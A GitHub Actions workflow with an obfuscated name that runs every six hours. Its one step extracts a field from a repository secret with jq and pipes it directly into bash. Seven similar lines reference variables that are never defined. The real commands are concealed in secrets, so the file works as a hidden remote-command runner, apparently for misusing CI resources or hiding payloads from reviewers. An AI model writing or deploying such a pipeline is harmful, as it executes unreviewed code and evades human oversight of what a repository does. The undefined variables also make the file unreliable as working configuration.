name: yanggongzi4371
on:
  workflow_dispatch:
  schedule:
    - cron: '2 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: yanggongzi4371
        env:
          g801: ${{ secrets.g801 }}
        run: |
          echo $g801 | jq -r .uju619 | /bin/bash
          echo $xl48516 | jq -r .m15617 | /bin/bash
          echo $p09589 | jq -r .kc3 | /bin/bash
          echo $iijwy70278 | jq -r .buq8 | /bin/bash
          echo $aqw011 | jq -r .egjom5549 | /bin/bash
          echo $lg69 | jq -r .oze3 | /bin/bash
          echo $ylr2279 | jq -r .bhqz4 | /bin/bash
          echo $gg6 | jq -r .kyz2 | /bin/bash

